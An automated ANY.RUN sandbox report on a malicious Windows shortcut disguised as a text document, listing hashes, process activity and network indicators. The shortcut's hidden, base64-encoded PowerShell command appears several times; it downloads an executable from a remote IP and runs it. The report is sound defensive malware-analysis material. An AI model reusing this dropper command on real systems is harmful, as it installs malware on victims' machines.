analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

668e68df81631d3ad7c8c5dc4babbce8fdfb4da309dd57822e0fd71568512de5

Full analysis: https://app.any.run/tasks/edf8e104-cd8e-4513-9b4e-577bd5895c9d
Verdict: Malicious activity
Analysis date: June 12, 2019, 11:48:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=70, Archive, ctime=Sun Nov 20 18:45:32 2016, mtime=Sun Nov 20 19:43:35 2016, atime=Sun Nov 20 18:45:32 2016, length=446976, window=hidenormalshowminimized
MD5:

D12C7676DAF58429DE228E4C811FD139

SHA1:

34EE0C04A434CB96DBAD7CBF25D9B464DE42797E

SHA256:

668E68DF81631D3AD7C8C5DC4BABBCE8FDFB4DA309DD57822E0FD71568512DE5

SSDEEP:

48:80lSW29zneLNOq2DYomGmPL7PTqiNSwqvoglVLT9TbIFg8ab:80sFyLsq5Brzdqvo4FTba

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3244)
      • powershell.exe (PID: 2344)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2344)
      • powershell.exe (PID: 3244)
    • PowerShell script executed

      • powershell.exe (PID: 2344)
      • powershell.exe (PID: 3244)
  • INFO

    • Manual execution by user

      • powershell.exe (PID: 2344)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: desktop-nhnj8e6
IconFileName: %SystemRoot%\SYSTEM32\shell32.dll
CommandLineArguments: -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA==
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Description: Text Document
LocalBasePath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: powershell.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 70
TargetFileSize: 446976
ModifyDate: 2016:11:20 20:45:32+01:00
AccessDate: 2016:11:20 21:43:35+01:00
CreateDate: 2016:11:20 20:45:32+01:00
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe cmd.exe no specs notepad.exe no specs powershell.exe no specs cmd.exe no specs notepad.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3244"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1508"C:\Windows\system32\cmd.exe" /c C:\Windows\notepad.exeC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2360C:\Windows\notepad.exeC:\Windows\notepad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2344"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3256"C:\Windows\system32\cmd.exe" /c C:\Windows\notepad.exeC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3500C:\Windows\notepad.exeC:\Windows\notepad.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2772"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\12a880658b507f3883b09bb1df05c43b.exe Q2VwaGFsbyAoQmV0YSk="C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
329
Read events
207
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3244powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNZ8NLZR6Q2HFSPGHILK.temp
MD5:
SHA256:
2344powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX3T072MNSP1OTX3C2LQ.temp
MD5:
SHA256:
3244powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7ee143d85a1cebd7.customDestinations-msbinary
MD5:15182286E3E65CA1EC1FA272CAEE8935
SHA256:0C916A3341D850228441EDB5956EE94192E50E7E1B90C9549D066F6B6ACBA631
2344powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1349d9254a3172e3.customDestinations-msbinary
MD5:15182286E3E65CA1EC1FA272CAEE8935
SHA256:0C916A3341D850228441EDB5956EE94192E50E7E1B90C9549D066F6B6ACBA631
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3244
powershell.exe
45.32.184.40:24163
Choopa, LLC
NL
malicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info